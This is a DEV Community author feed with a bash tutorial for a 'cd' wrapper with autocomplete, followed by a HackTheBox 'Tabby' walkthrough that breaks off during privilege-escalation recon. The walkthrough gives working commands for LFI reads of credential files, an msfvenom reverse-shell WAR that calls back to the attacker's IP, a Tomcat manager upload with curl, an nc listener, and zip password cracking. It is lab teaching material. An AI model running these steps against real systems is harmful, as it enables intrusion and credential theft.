DEV Community: Abass Sesay The latest articles on DEV Community by Abass Sesay (@bascoe10). https://dev.to/bascoe10 https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F33203%2F8e0fb7be-2a29-43e4-aa26-2dfa675f66dd.jpeg DEV Community: Abass Sesay https://dev.to/bascoe10 en Creating a "cd" Wrapper with Bash Autocomplete Abass Sesay Sun, 07 Feb 2021 02:39:59 +0000 https://dev.to/bascoe10/creating-a-cd-wrapper-with-bash-autocomplete-1li2 https://dev.to/bascoe10/creating-a-cd-wrapper-with-bash-autocomplete-1li2 <h1> TL;DR </h1> <blockquote> <p>A little bash function that wraps "cd" using a specified folder as a base folder complete with bash autocomplete.</p> </blockquote> <h1> Why </h1> <p>In the past year, I have been actively working on HackTheBox labs and now and then I find myself switch between directories in my "/HTB" . I keep having to use "cd ../" or the full path. This is a minor inconvenience but I want another way to do it; something like <code>&lt;command&gt; &lt;path&gt;</code>. Here <code>command</code> will know what know the base directory for the path.</p> <h1> How </h1> <p>The way went about solving my problem was to create a bash function that would take the path passed and concatenate that with the base directory. The output then passed to cd.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="k">function </span>htb <span class="o">{</span> mcd <span class="s2">"/home/kali/HTB/</span><span class="nv">$@</span><span class="s2">"</span> <span class="o">}</span> </code></pre> </div> <p>I used <code>$@</code> here instead of <code>$1</code> to give the flexibility to create folders with space in the name. I hardly every do this but it was a corner case I wanted to handle.<br> You might be thinking, what is this mcd ?<br> This is yet another wrapper for cd ;I got inspired by this article. This wrapper will create the directory if it does not exist. I threw a confirmation prompt before creating the directory. It is also doing a Sed substitution; changing <code>+</code> to space, the reason will be more apparent as later.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="k">function </span>mcd <span class="o">{</span> <span class="nb">local </span><span class="nv">path</span><span class="o">=</span><span class="si">$(</span><span class="nb">sed</span> <span class="s1">'s/+/\ /g'</span> <span class="o">&lt;&lt;&lt;</span> <span class="nv">$@</span><span class="si">)</span> <span class="k">if</span> <span class="o">[</span> <span class="o">!</span> <span class="nt">-e</span> <span class="s2">"</span><span class="nv">$path</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then </span><span class="nb">read</span> <span class="nt">-p</span> <span class="s2">"'</span><span class="nv">$path</span><span class="s2">' does not exist and will be created (Y[Enter]/N): "</span> confirmation <span class="k">case</span> <span class="s2">"</span><span class="nv">$confirmation</span><span class="s2">"</span> <span class="k">in</span> <span class="o">[!</span>yY]<span class="p">)</span> <span class="k">return</span> <span class="p">;;</span> <span class="k">esac</span> <span class="k">fi </span><span class="nb">mkdir</span> <span class="nt">-p</span> <span class="s2">"</span><span class="nv">$path</span><span class="s2">"</span> <span class="nb">cd</span> <span class="s2">"</span><span class="nv">$path</span><span class="s2">"</span> <span class="o">}</span> </code></pre> </div> <p>At this point we have functional wrapper with a base directory. The only things missing is the nice tab completion/suggestion that <code>cd</code> has. </p> <p>There are built-in bash commands that can implement autocomplete. I used <code>compgen</code> and <code>complete</code>. <br> <code>compgen -d</code> will list all directories in the current directory. If you specify a directory, it will list all directories in that directory.<br> <br>  </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kali@kali:~/HTB<span class="nv">$ </span><span class="nb">compgen</span> <span class="nt">-d</span> ~/HTB/ /home/kali/HTB/Academy /home/kali/HTB/Admirer /home/kali/HTB/Book /home/kali/HTB/Bucket /home/kali/HTB/Buff /home/kali/HTB/Cache /home/kali/HTB/Challenges /home/kali/HTB/Compromised /home/kali/HTB/Delivery /home/kali/HTB/Doctor /home/kali/HTB/Feline /home/kali/HTB/HelperScripts /home/kali/HTB/Jewel ... </code></pre> </div> <p><code>complete [options] name</code> specifics how argument are to be completed for <code>name</code>. <code>name</code> in my case is a function named <code>htb</code> . There are many options that can be specified for complete but in my case I only used 2; see link below for full documentation. I used the <code>-o nospace</code> flag, which controls the behavior of the completion by not adding a space after completion. I also used the <code>-F</code> flag to specify a function that updates the COMREPLY array variable that holds the auto complete option. This function is as follows.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="k">function </span>_comp_htb <span class="o">{</span> <span class="nv">COMPREPLY</span><span class="o">=(</span><span class="si">$(</span><span class="nb">compgen</span> <span class="nt">-d</span> /home/kali/HTB/<span class="s2">"</span><span class="nv">$2</span><span class="s2">"</span> |sed <span class="nt">-r</span> <span class="s2">"s:</span><span class="se">\ </span><span class="s2">:</span><span class="se">\\</span><span class="s2">+:g"</span><span class="si">)</span><span class="o">)</span> <span class="nv">COMPREPLY</span><span class="o">=(</span><span class="s2">"</span><span class="k">${</span><span class="nv">COMPREPLY</span><span class="p">[@]#/home/kali/HTB/</span><span class="k">}</span><span class="s2">"</span><span class="o">)</span> <span class="k">if</span> <span class="o">[[</span> <span class="k">${#</span><span class="nv">COMPREPLY</span><span class="p">[@]</span><span class="k">}</span> <span class="nt">-eq</span> 1 <span class="o">]]</span><span class="p">;</span> <span class="k">then </span><span class="nv">COMPREPLY</span><span class="o">=(</span><span class="s2">"</span><span class="k">${</span><span class="nv">COMPREPLY</span><span class="p">[@]</span><span class="k">}</span><span class="s2">/"</span><span class="o">)</span> <span class="k">fi</span> <span class="o">}</span> </code></pre> </div> <p>Let's go over what this function is doing.<br> <code>$(compgen -d /home/kali/HTB/"$2" |sed -r "s:\ :\\+:g")</code><br> In the above command, <code>compgen</code> will generate a list of directories that match the pattern passed. <code>$2</code> in this case is the argument that the user is trying to autocomplete. <br> If you try to create a bash array with this output you will run into issues if the there are directories with space in their name. Example, if you have a directory named "Test This", both "Test" and "This" will be considered as separated entries for the array.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kali@kali:~/Bash<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-al</span> total 12 drwxr-xr-x 3 kali kali 4096 Feb 6 18:27 ./ drwxr-xr-x 47 kali kali 4096 Feb 6 18:27 ../ drwxr-xr-x 2 kali kali 4096 Feb 6 18:27 <span class="s1">'This Directory Name Has Spaces'</span>/ kali@kali:~/Bash<span class="nv">$ TEST</span><span class="o">=(</span><span class="s2">"</span><span class="si">$(</span><span class="nb">compgen</span> <span class="nt">-d</span> <span class="si">)</span><span class="s2">"</span><span class="o">)</span> <span class="nb">printf</span> <span class="s1">'Element -&gt; %s\n'</span> <span class="k">${</span><span class="nv">TEST</span><span class="p">[@]</span><span class="k">}</span> Element -&gt; This Element -&gt; Directory Element -&gt; Name Element -&gt; Has Element -&gt; Spaces kali@kali:~/Bash<span class="err">$</span> </code></pre> </div> <p>To bypass this issue, I used sed to replaced spaces with <code>+</code> and later when <code>mcd</code> is called, it will replace the <code>+</code> with space. I store the result in COMPREPLY </p> <blockquote> <p>Compreply - An array variable from which Bash reads the possible completions generated by a shell function invoked by the programmable completion facility (see Programmable Completion). Each array element contains one possible completion.</p> </blockquote> <p><code>${COMPREPLY[@]#/home/kali/HTB/}</code><br> Here I am using shell parameter expansion to remove the base directory name from the list of autocomplete options. <code>[@]</code> traverses over the list and <code>#</code> deletes the pattern that follows; in this case <code>/home/kali/HTB/</code> .<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="k">if</span> <span class="o">[[</span> <span class="k">${#</span><span class="nv">COMPREPLY</span><span class="p">[@]</span><span class="k">}</span> <span class="nt">-eq</span> 1 <span class="o">]]</span><span class="p">;</span> <span class="k">then </span><span class="nv">COMPREPLY</span><span class="o">=(</span><span class="s2">"</span><span class="k">${</span><span class="nv">COMPREPLY</span><span class="p">[@]</span><span class="k">}</span><span class="s2">/"</span><span class="o">)</span> <span class="k">fi</span> </code></pre> </div> <p>This condition checks to determine if only a single directory has been resolved and from here on the autocomplete continues into that directory.<br> Putting everything together.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="k">function </span>mcd <span class="o">{</span> <span class="nb">local </span><span class="nv">path</span><span class="o">=</span><span class="si">$(</span><span class="nb">sed</span> <span class="s1">'s/+/\ /g'</span> <span class="o">&lt;&lt;&lt;</span> <span class="nv">$@</span><span class="si">)</span> <span class="k">if</span> <span class="o">[</span> <span class="o">!</span> <span class="nt">-e</span> <span class="s2">"</span><span class="nv">$path</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then </span><span class="nb">read</span> <span class="nt">-p</span> <span class="s2">"'</span><span class="nv">$path</span><span class="s2">' does not exist and will be created (Y[Enter]/N): "</span> confirmation <span class="k">case</span> <span class="s2">"</span><span class="nv">$confirmation</span><span class="s2">"</span> <span class="k">in</span> <span class="o">[!</span>yY]<span class="p">)</span> <span class="k">return</span> <span class="p">;;</span> <span class="k">esac</span> <span class="k">fi </span><span class="nb">mkdir</span> <span class="nt">-p</span> <span class="s2">"</span><span class="nv">$path</span><span class="s2">"</span> <span class="nb">cd</span> <span class="s2">"</span><span class="nv">$path</span><span class="s2">"</span> <span class="o">}</span> <span class="k">function </span>htb <span class="o">{</span> mcd <span class="s2">"/home/kali/HTB/</span><span class="nv">$@</span><span class="s2">"</span> <span class="o">}</span> <span class="k">function </span>_comp_htb <span class="o">{</span> <span class="nv">COMPREPLY</span><span class="o">=(</span><span class="si">$(</span><span class="nb">compgen</span> <span class="nt">-d</span> /home/kali/HTB/<span class="s2">"</span><span class="nv">$2</span><span class="s2">"</span> |sed <span class="nt">-r</span> <span class="s2">"s:</span><span class="se">\ </span><span class="s2">:</span><span class="se">\\</span><span class="s2">+:g"</span><span class="si">)</span><span class="o">)</span> <span class="nv">COMPREPLY</span><span class="o">=(</span><span class="s2">"</span><span class="k">${</span><span class="nv">COMPREPLY</span><span class="p">[@]#/home/kali/HTB/</span><span class="k">}</span><span class="s2">"</span><span class="o">)</span> <span class="k">if</span> <span class="o">[[</span> <span class="k">${#</span><span class="nv">COMPREPLY</span><span class="p">[@]</span><span class="k">}</span> <span class="nt">-eq</span> 1 <span class="o">]]</span><span class="p">;</span> <span class="k">then </span><span class="nv">COMPREPLY</span><span class="o">=(</span><span class="s2">"</span><span class="k">${</span><span class="nv">COMPREPLY</span><span class="p">[@]</span><span class="k">}</span><span class="s2">/"</span><span class="o">)</span> <span class="k">fi</span> <span class="o">}</span> <span class="nb">complete</span> <span class="nt">-o</span> nospace <span class="nt">-F</span> _comp_htb htb </code></pre> </div> <h1> What's Next? </h1> <p>At this point, I have fulfilled all that I promised in the title. Despite this, I took it one step further. I do TryHackLabs every now and then so I replicated this solution for it. Instead of creating a special completion function for TryHackMe, I just abstracted my current completion function to use a different base directory depending on the function making the call.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="k">function </span>mcd <span class="o">{</span> <span class="nb">local </span><span class="nv">path</span><span class="o">=</span><span class="si">$(</span><span class="nb">sed</span> <span class="s1">'s/+/\ /g'</span> <span class="o">&lt;&lt;&lt;</span> <span class="nv">$@</span><span class="si">)</span> <span class="k">if</span> <span class="o">[</span> <span class="o">!</span> <span class="nt">-e</span> <span class="s2">"</span><span class="nv">$path</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then </span><span class="nb">read</span> <span class="nt">-p</span> <span class="s2">"'</span><span class="nv">$path</span><span class="s2">' does not exist and will be created (Y[Enter]/N): "</span> confirmation <span class="k">case</span> <span class="s2">"</span><span class="nv">$confirmation</span><span class="s2">"</span> <span class="k">in</span> <span class="o">[!</span>yY]<span class="p">)</span> <span class="k">return</span> <span class="p">;;</span> <span class="k">esac</span> <span class="k">fi </span><span class="nb">mkdir</span> <span class="nt">-p</span> <span class="s2">"</span><span class="nv">$path</span><span class="s2">"</span> <span class="nb">cd</span> <span class="s2">"</span><span class="nv">$path</span><span class="s2">"</span> <span class="o">}</span> <span class="k">function </span>_comp_custom_cd <span class="o">{</span> <span class="nb">local </span>basedir <span class="k">case</span> <span class="nv">$1</span> <span class="k">in </span>htb<span class="p">)</span> <span class="nv">basedir</span><span class="o">=</span><span class="s2">"/home/kali/HTB/"</span> <span class="p">;;</span> thm<span class="p">)</span> <span class="nv">basedir</span><span class="o">=</span><span class="s2">"/home/kali/TryHackMe/"</span> <span class="p">;;</span> <span class="k">esac</span> <span class="nv">COMPREPLY</span><span class="o">=(</span><span class="si">$(</span><span class="nb">compgen</span> <span class="nt">-d</span> <span class="s2">"</span><span class="nv">$basedir$2</span><span class="s2">"</span> |sed <span class="nt">-r</span> <span class="s2">"s:</span><span class="se">\ </span><span class="s2">:</span><span class="se">\\</span><span class="s2">+:g"</span><span class="si">)</span><span class="o">)</span> <span class="nv">COMPREPLY</span><span class="o">=(</span><span class="s2">"</span><span class="k">${</span><span class="nv">COMPREPLY</span><span class="p">[@]#</span><span class="nv">$basedir</span><span class="k">}</span><span class="s2">"</span><span class="o">)</span> <span class="k">if</span> <span class="o">[[</span> <span class="k">${#</span><span class="nv">COMPREPLY</span><span class="p">[@]</span><span class="k">}</span> <span class="nt">-eq</span> 1 <span class="o">]]</span><span class="p">;</span> <span class="k">then </span><span class="nv">COMPREPLY</span><span class="o">=(</span><span class="s2">"</span><span class="k">${</span><span class="nv">COMPREPLY</span><span class="p">[@]</span><span class="k">}</span><span class="s2">/"</span><span class="o">)</span> <span class="k">fi</span> <span class="o">}</span> <span class="k">function </span>htb <span class="o">{</span> mcd <span class="s2">"/home/kali/HTB/</span><span class="nv">$@</span><span class="s2">"</span> <span class="o">}</span> <span class="nb">complete</span> <span class="nt">-o</span> nospace <span class="nt">-F</span> _comp_custom_cd htb <span class="k">function </span>thm <span class="o">{</span> mcd <span class="s2">"/home/kali/TryHackMe/</span><span class="nv">$1</span><span class="s2">"</span> <span class="o">}</span> <span class="nb">complete</span> <span class="nt">-o</span> nospace <span class="nt">-F</span> _comp_custom_cd thm </code></pre> </div> <h1> Links </h1> <p><a href="https://www.digitalocean.com/community/tutorials/an-introduction-to-useful-bash-aliases-and-functions">https://www.digitalocean.com/community/tutorials/an-introduction-to-useful-bash-aliases-and-functions</a></p> <p><a href="https://www.gnu.org/software/bash/manual/bash.html#index-COMPREPLY">https://www.gnu.org/software/bash/manual/bash.html#index-COMPREPLY</a></p> <p><a href="https://www.gnu.org/software/bash/manual/bash.html#Programmable-Completion-Builtins">https://www.gnu.org/software/bash/manual/bash.html#Programmable-Completion-Builtins</a></p> bash productivity scripting Tabby - HackTheBox Abass Sesay Fri, 06 Nov 2020 08:26:53 +0000 https://dev.to/bascoe10/tabby-hackthebox-25c4 https://dev.to/bascoe10/tabby-hackthebox-25c4 <h1> TL;DR </h1> <blockquote> <p>Foothold for this box involved LFI coupled with Tomcat Manger App exploit. Once on the box, gaining User access requires enumeration, enumeration, enumeration. Gaining root require exploit a legitimate application, LXC.</p> </blockquote> <h1> Reconnaissance </h1> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>Nmap to the rescue <span class="k">for </span>recon. This will give us an idea of the potential attack vectors. PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> 80/tcp open http Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span> |_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span> |_http-title: Mega Hosting 8080/tcp open http Apache Tomcat | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST |_http-open-proxy: Proxy might be redirecting requests |_http-title: Apache Tomcat 12712/tcp closed unknown 26817/tcp closed unknown 27436/tcp closed unknown 34408/tcp closed unknown 46483/tcp closed unknown 61123/tcp closed unknown Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel </code></pre> </div> <p>The 2 open http ports (80 &amp; 8080), are the primary focus to gain initial foothold.</p> <p>Hosted at port 80 is a PHP website offering hosting services.<br> <a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fjldsxuyaj6lu1nane04p.png" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fjldsxuyaj6lu1nane04p.png" alt="Port 80"></a></p> <p>It is always a good practice to view the source of the page. From here you can see Local File Inclusion (LFI) is possible. You can try grabbing the file such as the "/etc/passwd". More on this later.</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fg485fqiiyd5kbyz69pod.png" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fg485fqiiyd5kbyz69pod.png" alt="Alt Text"></a></p> <p>Navigating to the site hosted at port 8080, we see the welcome page shows that tomcat9 is installed and also provides links to Tomcat manager app. This app is the route to getting initial foothold but you will need valid credentials.</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fodblhaw4fi8vzk4sril3.png" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fodblhaw4fi8vzk4sril3.png" alt="Port 8080"></a></p> <p>With a valid credential, you can deploy a rogue app that would then give us access. As per the Tomcat documentation, the users that can access the manager application are in $CATALINA_BASE/conf/tomcat-users.xml. The goal now is to use the LFI from port 80 to grab the contents of the tomcat-users.xml. Using the $CATALINA_BASE dir listed on the webpage, you cannot get the users file. Searching around, you will find a file list for tomcat9. From this list you can see that the full directory of the user file is "/usr/share/tomcat9/etc/tomcat-users.xml". With the LFI on port 80, we can get the context of this file.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kali@kali:~/HTB/Tabby<span class="nv">$ </span>curl http://megahosting.htb/news.php?file<span class="o">=</span>../../../../../../usr/share/tomcat9/etc/tomcat-users.xml &lt;?xml <span class="nv">version</span><span class="o">=</span><span class="s2">"1.0"</span> <span class="nv">encoding</span><span class="o">=</span><span class="s2">"UTF-8"</span>?&gt; &lt;<span class="o">!</span><span class="nt">--</span> Licensed to the Apache Software Foundation <span class="o">(</span>ASF<span class="o">)</span> under one or more contributor license agreements. See the NOTICE file distributed with this work <span class="k">for </span>additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 <span class="o">(</span>the <span class="s2">"License"</span><span class="o">)</span><span class="p">;</span> you may not use this file except <span class="k">in </span>compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to <span class="k">in </span>writing, software distributed under the License is distributed on an <span class="s2">"AS IS"</span> BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License <span class="k">for </span>the specific language governing permissions and limitations under the License. <span class="nt">--</span><span class="o">&gt;</span> &lt;tomcat-users <span class="nv">xmlns</span><span class="o">=</span><span class="s2">"http://tomcat.apache.org/xml"</span> xmlns:xsi<span class="o">=</span><span class="s2">"http://www.w3.org/2001/XMLSchema-instance"</span> xsi:schemaLocation<span class="o">=</span><span class="s2">"http://tomcat.apache.org/xml tomcat-users.xsd"</span> <span class="nv">version</span><span class="o">=</span><span class="s2">"1.0"</span><span class="o">&gt;</span> &lt;<span class="o">!</span><span class="nt">--</span> NOTE: By default, no user is included <span class="k">in </span>the <span class="s2">"manager-gui"</span> role required to operate the <span class="s2">"/manager/html"</span> web application. If you wish to use this app, you must define such a user - the username and password are arbitrary. It is strongly recommended that you <span class="k">do </span>NOT use one of the <span class="nb">users </span><span class="k">in </span>the commented out section below since they are intended <span class="k">for </span>use with the examples web application. <span class="nt">--</span><span class="o">&gt;</span> &lt;<span class="o">!</span><span class="nt">--</span> NOTE: The sample user and role entries below are intended <span class="k">for </span>use with the examples web application. They are wrapped <span class="k">in </span>a comment and thus are ignored when reading this file. If you wish to configure these <span class="nb">users </span><span class="k">for </span>use with the examples web application, <span class="k">do </span>not forget to remove the &lt;<span class="o">!</span>.. ..&gt; that surrounds them. You will also need to <span class="nb">set </span>the passwords to something appropriate. <span class="nt">--</span><span class="o">&gt;</span> &lt;<span class="o">!</span><span class="nt">--</span> &lt;role <span class="nv">rolename</span><span class="o">=</span><span class="s2">"tomcat"</span>/&gt; &lt;role <span class="nv">rolename</span><span class="o">=</span><span class="s2">"role1"</span>/&gt; &lt;user <span class="nv">username</span><span class="o">=</span><span class="s2">"tomcat"</span> <span class="nv">password</span><span class="o">=</span><span class="s2">"&lt;must-be-changed&gt;"</span> <span class="nv">roles</span><span class="o">=</span><span class="s2">"tomcat"</span>/&gt; &lt;user <span class="nv">username</span><span class="o">=</span><span class="s2">"both"</span> <span class="nv">password</span><span class="o">=</span><span class="s2">"&lt;must-be-changed&gt;"</span> <span class="nv">roles</span><span class="o">=</span><span class="s2">"tomcat,role1"</span>/&gt; &lt;user <span class="nv">username</span><span class="o">=</span><span class="s2">"role1"</span> <span class="nv">password</span><span class="o">=</span><span class="s2">"&lt;must-be-changed&gt;"</span> <span class="nv">roles</span><span class="o">=</span><span class="s2">"role1"</span>/&gt; <span class="nt">--</span><span class="o">&gt;</span> &lt;role <span class="nv">rolename</span><span class="o">=</span><span class="s2">"admin-gui"</span>/&gt; &lt;role <span class="nv">rolename</span><span class="o">=</span><span class="s2">"manager-script"</span>/&gt; &lt;user <span class="nv">username</span><span class="o">=</span><span class="s2">"tomcat"</span> <span class="nv">password</span><span class="o">=</span><span class="s2">"</span><span class="nv">$3cureP4s5w0rd123</span><span class="s2">!"</span> <span class="nv">roles</span><span class="o">=</span><span class="s2">"admin-gui,manager-script"</span>/&gt; &lt;/tomcat-users&gt; </code></pre> </div> <p>As you can see the both the username and password for the manager app are in the user file.</p> <blockquote> <p>Keep in mind that if you do this through the browser, you will get a blank page. You would have to view the content of the page to see the config file. This is because none of the tags are valid HTML tags.</p> </blockquote> <h1> Foothold </h1> <p>Now that we have creds, the next step if to gain a foothold in the system. Going back to port 8080, we can log into the manager app with the username and password. The application will accept the credential for basic authentication, but it will show you a 403 error. This is because our user does not have the "manager-gui" role.</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fhqfqv3ed3cgl597gmzhw.png" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fhqfqv3ed3cgl597gmzhw.png" alt="Alt Text"></a></p> <p>You can use the credential with curl to upload rogue application that will then give you a foothold. To generate the java war file that will be deployed on the server, you can leverage msfvenom or write one. I went with the former.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kali@kali:~/HTB/Tabby<span class="nv">$ </span>msfvenom <span class="nt">-p</span> java/jsp_shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>10.10.14.14 <span class="nv">LPORT</span><span class="o">=</span>1337 <span class="nt">-f</span> war <span class="o">&gt;</span> revshell.war Payload size: 1089 bytes Final size of war file: 1089 bytes This file can now be deployed and be accessed at a specified endpoint <span class="o">(</span>/foo<span class="o">)</span><span class="nb">.</span> kali@kali:~/HTB/Tabby<span class="nv">$ pass</span><span class="o">=</span><span class="s2">"</span><span class="se">\$</span><span class="s2">3cureP4s5w0rd123!"</span> kali@kali:~/HTB/Tabby<span class="nv">$ </span>curl <span class="nt">-v</span> <span class="nt">-u</span> tomcat:<span class="nv">$pass</span> <span class="nt">--upload-file</span> revshell.war <span class="s2">"http://10.10.10.194:8080/manager/text/deploy?path=/foo&amp;update=true"</span> <span class="k">*</span> Trying 10.10.10.194:8080... <span class="k">*</span> Connected to 10.10.10.194 <span class="o">(</span>10.10.10.194<span class="o">)</span> port 8080 <span class="o">(</span><span class="c">#0)</span> <span class="k">*</span> Server auth using Basic with user <span class="s1">'tomcat'</span> <span class="o">&gt;</span> PUT /manager/text/deploy?path<span class="o">=</span>/foo&amp;update<span class="o">=</span><span class="nb">true </span>HTTP/1.1 <span class="o">&gt;</span> Host: 10.10.10.194:8080 <span class="o">&gt;</span> Authorization: Basic <span class="nv">dG9tY2F0OiQzY3VyZVA0czV3MHJkMTIzIQ</span><span class="o">==</span> <span class="o">&gt;</span> User-Agent: curl/7.72.0 <span class="o">&gt;</span> Accept: <span class="k">*</span>/<span class="k">*</span> <span class="o">&gt;</span> Content-Length: 1089 <span class="o">&gt;</span> Expect: 100-continue <span class="o">&gt;</span> <span class="k">*</span> Mark bundle as not supporting multiuse &lt; HTTP/1.1 100 <span class="k">*</span> We are completely uploaded and fine <span class="k">*</span> Mark bundle as not supporting multiuse &lt; HTTP/1.1 200 &lt; Cache-Control: private &lt; Expires: Thu, 01 Jan 1970 00:00:00 GMT &lt; X-Content-Type-Options: nosniff &lt; Content-Type: text/plain<span class="p">;</span><span class="nv">charset</span><span class="o">=</span>utf-8 &lt; Transfer-Encoding: chunked &lt; Date: Thu, 05 Nov 2020 05:08:56 GMT &lt; OK - Deployed application at context path <span class="o">[</span>/foo] <span class="k">*</span> Connection <span class="c">#0 to host 10.10.10.194 left intact</span> </code></pre> </div> <p>Now all you have to do is navigate to "<a href="http://10.10.10.194:8080/foo/" rel="noopener noreferrer">http://10.10.10.194:8080/foo/</a>" to start a reverse shell.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kali@kali:~/HTB/Tabby<span class="nv">$ </span>nc <span class="nt">-lvnp</span> 1337 listening on <span class="o">[</span>any] 1337 ... connect to <span class="o">[</span>10.10.14.14] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.194] 60742 python3 <span class="nt">-c</span> <span class="s2">"import pty;pty.spawn('/bin/bash')"</span> tomcat@tabby:/var/lib/tomcat9<span class="nv">$ </span>^Z <span class="o">[</span>1]+ Stopped nc <span class="nt">-lvnp</span> 1337 kali@kali:~/HTB/Tabby<span class="nv">$ </span><span class="nb">stty </span>raw <span class="nt">-echo</span> kali@kali:~/HTB/Tabby<span class="nv">$ </span>nc <span class="nt">-lvnp</span> 1337 tomcat@tabby:/var/lib/tomcat9<span class="nv">$ </span> tomcat@tabby:/var/lib/tomcat9<span class="nv">$ </span><span class="nb">export </span><span class="nv">TERM</span><span class="o">=</span>xterm </code></pre> </div> <blockquote> <p>Do the following to improve your shell experience and get a fully interactive TTY.<br> </p> </blockquote> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>{In remote shell} python3 -c "import pty;pty.spawn('/bin/bash')" [Ctrl-Z] {In local shell} stty raw -echo fg [enter] [enter] {In remote shell} export TERM=xterm </code></pre> </div> <h1> User Exploit </h1> <p>Running Linpeas, you see that the user on the box; ash, has a password protected backup zip file.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">[</span>+] Backup files? <span class="nt">-rw-r--r--</span> 1 ash ash 8716 Jun 16 13:42 /var/www/html/files/16162020_backup.zip <span class="nt">-rw-r--r--</span> 1 root root 2743 Apr 23 2020 /etc/apt/sources.list.curtin.old </code></pre> </div> <p>You can use the tool fcrackzip to recover the password<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kali@kali:~/HTB/Tabby<span class="nv">$ </span>fcrackzip <span class="nt">-D</span> <span class="nt">-p</span> /usr/share/wordlists/rockyou.txt ash.zip possible pw found: admin@it <span class="o">()</span> </code></pre> </div> <p>There is not much to the zip file, but you can use this password to pivot to the user ash and get the user flag.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>tomcat@tabby:/tmp<span class="nv">$ </span>su ash Password: ash@tabby:~<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-al</span> total 28 drwxr-x--- 3 ash ash 4096 Jun 16 13:59 <span class="nb">.</span> drwxr-xr-x 3 root root 4096 Jun 16 13:32 .. lrwxrwxrwx 1 root root 9 May 21 20:32 .bash_history -&gt; /dev/null <span class="nt">-rw-r-----</span> 1 ash ash 220 Feb 25 2020 .bash_logout <span class="nt">-rw-r-----</span> 1 ash ash 3771 Feb 25 2020 .bashrc drwx------ 2 ash ash 4096 May 19 11:48 .cache <span class="nt">-rw-r-----</span> 1 ash ash 807 Feb 25 2020 .profile <span class="nt">-rw-r-----</span> 1 ash ash 0 May 19 11:48 .sudo_as_admin_successful <span class="nt">-rw-r-----</span> 1 ash ash 33 Nov 5 05:41 user.txt ash@tabby:~<span class="nv">$ </span><span class="nb">wc</span> <span class="nt">-l</span> user.txt 1 user.txt ash@tabby:~<span class="nv">$ </span><span class="nb">wc </span>user.txt 1 1 33 user.txt ash@tabby:~<span class="err">$</span> </code></pre> </div> <h1> More Reconnaissance </h1> <p>Moving on to root privesc, more recon is needed. Again, from Linpeas results, you can see that the user ash is part of the lxd group. The provides a path to escalate to root. LXC is a lightweight virtualization technology and LXD is the corresponding hypervisor.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">[</span>+] All 